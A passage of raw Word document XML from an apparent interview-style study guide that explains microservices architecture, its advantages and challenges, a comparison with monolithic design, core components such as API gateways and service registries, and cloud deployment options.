          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>complex systems</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> where </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>high scalabilit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distributed architectures</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are critical. They provide a clear advantage in systems that need to track, replay, or scale events and states independently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DFA3A30" w14:textId="1492B232"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3057" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D64C8A0" w14:textId="76DE815E" w:rsidR="001659D4" w:rsidRPr="00CE4B95" w:rsidRDefault="00AF4871">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="726" w:name="_Toc197867940"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain Microservices architecture</w:t>
      </w:r>
      <w:r w:rsidR="001659D4" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="726"/>
    </w:p>
    <w:p w14:paraId="7D5469EB" w14:textId="3A3D5E7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Here’s a detailed explanation of </w:t>
      </w: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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D2B72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Key Characteristics of Microservices Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12CA4F5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Services:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765322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utonomous Deployment:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0CAE5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independently deployed and updated. This means that new features or bug fixes can be added to one service without affecting the other services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D89D64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centralized Data Management:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BEDB6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Each microservice typically has its own database (known as </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Database per Service</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>). This avoids the bottleneck of a shared database, allowing each service to manage its data in a way that fits its needs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6975EDB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 Between Services:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C2DB3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communicate with each other via lightweight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ssage brokers</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., Kafka, RabbitMQ). Each service exposes an API or a message queue to send and receive information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30590C9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main-Driven Design (DDD):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6344831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Microservices are often designed around business domains using the </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Domain-Driven Design (DDD)</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> principles. Each service is a reflection of a specific business functionality, such as "order processing" or "payment."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56654C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esilience and Fault Tolerance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073AEA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are designed to handle failures gracefully. If one service fails, it doesn't necessarily bring down the whole system. Technique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retry mechanisms</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are used to handle failures and improve reliability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A48DAC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57FE543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Agnostic:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2003D32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450E7B5">
          <v:rect id="_x0000_i3058" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B0843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dvantages of Microservices Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BCC4E6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07E88FF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you to scale individual services as needed. For example, if a payment service is under heavy load, you can scale just that service, rather than scaling the entire application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE8130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ster Time to Market:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052EF00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Because each service is independent and smaller in scope, teams can work on different services concurrently. This accelerates development and leads to faster delivery of new features.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B9FE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Deployments:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6922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enable </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>continuous delivery</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> because each service can be deployed independently. This reduces deployment risks and allows you to update services without affecting the whole system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4250F6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roved Fault Isolation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FD666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services are decoupled, a failure in one service does not directly affect others. The system is more resilient, and failures are easier to isolate and fix.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324DA6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Flexibility:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6807C1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asier Maintenance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358D029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maller, focused codebases are easier to maintain and understand. Teams can concentrate on specific business areas, and the system is less complex overall.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA8B6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etter Alignment with Organizational Structure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7FFB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teams to align with business functions. Each team can own and maintain a particular service, allowing for greater ownership and focus.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64DA421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5E93E">
          <v:rect id="_x0000_i3059" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="24269ED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hallenges of Microservices Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A844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plexity:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A65E8C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ile microservices decompose a system into smaller pieces, this can also lead to increased complexity in terms of managing multiple services, communication between them, and handling distributed data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A04A7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istributed System Complexity:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A54F90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Handling a distributed system comes with challenges such as network latency, message serialization/deserialization, and service discovery. Debugging and tracing across services can also be difficult.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E2D79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 Management:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617679D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anaging data consistency across services becomes more challenging. Since each service has its own database, maintaining data consistency and handling transactions can be more complex. </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Eventual consistenc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s</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are often used to address this.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192D75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 Overhead:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000304B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etwork Overhead:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16EFD99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Testing Complexity:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574D351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esting microservices requires testing not only individual services but also how they interact with each other. This requires proper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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47FA8AAF"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61A4E0">
          <v:rect id="_x0000_i3060" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A73D2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4086"/>
        <w:gridCol w:w="4004"/>
      </w:tblGrid>
      <w:tr w:rsidR="00312742" w:rsidRPr="00FA65E9" w14:paraId="1B91A123" w14:textId="77777777" w:rsidTr="00312742">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="37E107D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spect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4EF759E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onolithic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02413B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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00312742" w:rsidRPr="00FA65E9" w14:paraId="6C04FDDA" w14:textId="77777777" w:rsidTr="00312742">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3CDF7B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tructure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="64999DE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ngle large codebase</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="744A936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small, independent services</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00312742" w:rsidRPr="00FA65E9" w14:paraId="430FB373" w14:textId="77777777" w:rsidTr="00312742">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="168B79B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tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7FC98C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ing involves scaling the entire application</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="722CFDC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e services independently based on need</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00312742" w:rsidRPr="00FA65E9" w14:paraId="79051A3E" w14:textId="77777777" w:rsidTr="00312742">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4C6410A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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="35DEBF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One deployable unit (e.g., a JAR file)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3D6F7C6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deployable units (e.g., containers)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00312742" w:rsidRPr="00FA65E9" w14:paraId="24759EB6" w14:textId="77777777" w:rsidTr="00312742">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="53CCA2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ult Isolation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C88AA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part affects the whole system</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="51FAFAD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s are isolated to specific services</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00312742" w:rsidRPr="00FA65E9" w14:paraId="0E006C52" w14:textId="77777777" w:rsidTr="00312742">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4F5684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Stack</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4515FCE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Typically uniform (e.g., Java or .NET)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="779443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use different tech stacks per service</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00312742" w:rsidRPr="00FA65E9" w14:paraId="75A432A0" w14:textId="77777777" w:rsidTr="00312742">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="414836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aintenance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0A623C0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complex as the codebase grows</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="75A5D3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asier to maintain as each service is smaller</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00312742" w:rsidRPr="00FA65E9" w14:paraId="649AF4A4" w14:textId="77777777" w:rsidTr="00312742">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="37372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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="591D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irect method calls between components</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5BD3BA3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Network calls (HTTP, gRPC, etc.)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00312742" w:rsidRPr="00FA65E9" w14:paraId="1CCB3710" w14:textId="77777777" w:rsidTr="00312742">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="27A827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velopment Speed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7906C12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lower as the system grows</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="132C126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ster, since teams can work independently</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3B0C30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FFEE571">
          <v:rect id="_x0000_i3061" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA91C0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s of Microservices Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA639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730AED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n API Gateway is used as an entry point for client applications to access the microservices. It handles routing, load balancing, security, and sometimes even request/response transformation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0536207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Registry and Discovery:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0889179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register themselves with a </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>service registry</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and other services can discover them using their registered name. This is especially useful when services are dynamically scaling up or down.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5A5D2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oad Balancing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB3CF6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ensures that requests are distributed across available instances of microservices. This can be achieved using tool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Load Balancer</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C29358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ter-Service Communication:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F861D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communicate with each other using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asynchronous communication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ACDC2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base per Service:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A6DE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typically has its own database, allowing it to manage its data independently. This avoids issues with sharing a common database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A7382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onitoring and Logging:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2821D9A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require a robust monitoring and logging system to ensure that each service's health is tracked and any issues are quickly identified.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are commonly used.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A8B3D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curity:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240716F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curity is an important aspect of microservices. Each service should authenticate requests, and an </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>OAuth 2.0</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JWT</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> token-based system can be used for securing APIs. An API Gateway can be used to centralize authentication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F08EAD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B4DF24">
          <v:rect id="_x0000_i3062" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5426A754"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When to Use Microservices Architecture?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69EE1E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arge Applications:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F097ED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building a large and complex system that needs to scale, microservices allow individual parts of the system to be scaled independently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A52EE2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requent Releases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A87C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your organization requires frequent releases and independent deployments for different parts of the system, microservices provide the agility needed for continuous delivery.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057D18E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am Autonomy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B30749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you have a large team or several teams working on different business domains, microservices help in giving each team ownership of a specific service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF57A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olving Systems:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705E035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a system is likely to evolve over time (e.g., adding new features or adopting new technologies), microservices provide flexibility and modularity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B21FF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5E13FAC">
          <v:rect id="_x0000_i3063" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0980B2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294411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3064" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4387FA93" w14:textId="5749BFE8" w:rsidR="001659D4" w:rsidRPr="00CE4B95" w:rsidRDefault="00AF4871">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="727" w:name="_Toc197867941"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Where are you deploying your microservice</w:t>
      </w:r>
      <w:r w:rsidR="001659D4" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="727"/>
    </w:p>
    <w:p w14:paraId="7A5EFB25" w14:textId="5F86A2C4"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The deployment of microservices can vary depending on the infrastructure and the needs of the organization. Here are common options for deploying microservices:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D5C53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loud Platforms:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BFB6B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Amazon Web Services):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67533C0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lastic Kubernetes Service (E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astic Beanstalk</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can be used for orchestrating containerized microservices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F31F56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Lambda</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for serverless deployments where each microservice runs as a function.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA0B16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oft Azure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C3C59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Azure Kubernetes Service (A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Services</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are common choices for containerized or serverless microservices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E7F282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Google Cloud Platform (GCP):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F33A61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Google Kubernetes Engine (GKE)</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Engine</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
